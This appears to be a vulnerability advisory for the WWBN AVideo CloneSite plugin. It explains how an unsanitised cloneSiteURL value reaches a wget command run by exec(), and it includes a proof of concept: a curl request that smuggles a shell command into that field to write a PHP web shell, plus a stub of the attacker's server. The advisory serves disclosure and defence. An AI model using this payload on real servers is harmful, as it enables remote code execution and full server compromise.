Server side template injection In wwbn/avideo
Description
WWBN AVideo: RCE cause by clonesite plugin Description
Summary
The cloneServer.json.php endpoint in the CloneSite plugin constructs shell commands using user-controlled input (url parameter) without proper sanitization. The input is directly concatenated into a wget command executed via exec(), allowing command injection.
An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., ;). This leads to Remote Code Execution (RCE) on the server.
Details
Inside plugin/CloneSite/cloneClient.json.php(line112) didn't have proper sanitization
$objClone->cloneSiteURL = str_replace("'", '', escapeshellarg($objClone->cloneSiteURL));
use str_replace make ' added by escapeshellarg become so hacker can inject evil cloneSiteURL to rce
$sqlURL = "{$objClone->cloneSiteURL}videos/clones/{$json->sqlFile}"; \\116 $cmd = "wget -O {$sqlFile} {$sqlURL}"; \\117 exec($cmd . " 2>&1", $output, $return_val); \\119
The attack flow
make a evil site to provide date
add evil url in objects/pluginAddDataObject.json.php
access plugin/CloneSite/cloneClient.json.php to trigger rce
Poc
make a evil site use python like this
from flask import Flask, jsonify, request app = Flask(__name__) @app.route('/', defaults={'path': ''}) @app.route('/<path:path>') def catch_all(path): print("PATH:", path)...
change url with payload like (need admin)
curl -b 'PHPSESSID=<admin_session>' -X POST "http://127.0.0.1/objects/pluginAddDataObject.json.php" \ -H "Content-Type: application/json" \ -d '{ "cloneSiteURL":"http://127.0.0.1:8071/;echo${IFS}\"<?=system(\\$_POST[1])?>\"${IFS}>1.php;/", "cloneSiteSSHIP":"127.0.0.1", "cloneSiteSSHUser":"1", "cloneSiteSSHPort":"22",...
this payload is to create a web shell
then access plugin/CloneSite/cloneClient.json.php
1.phpwill be created
impact
Remote Code Execution: An attacker can write arbitrary PHP code to any writable web-accessible directory, achieving full server compromise.
Full server compromise: With arbitrary PHP execution as the web server user, the attacker can read/modify the database, access all user data, pivot to other services, and potentially escalate privileges on the host.
Recommended Fix
add more powerful sanitization for $objClone->cloneSiteURL
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Package | Affected version |
|---|---|---|
 packagist |
Aliases
References